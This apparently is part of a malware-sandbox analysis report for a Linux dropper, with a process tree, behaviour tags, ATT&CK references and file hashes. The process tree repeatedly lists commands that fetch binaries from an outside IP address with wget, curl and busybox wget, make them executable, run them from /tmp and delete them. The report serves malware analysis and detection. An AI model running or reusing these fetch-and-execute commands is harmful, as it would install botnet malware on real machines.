/usr/bin/curlcurl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:925
-
-
/bin/chmodchmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:932
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:938
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:944
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:950
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:956
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:962
-
-
/bin/chmodchmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:968
-
-
/bin/chmodchmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:971
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97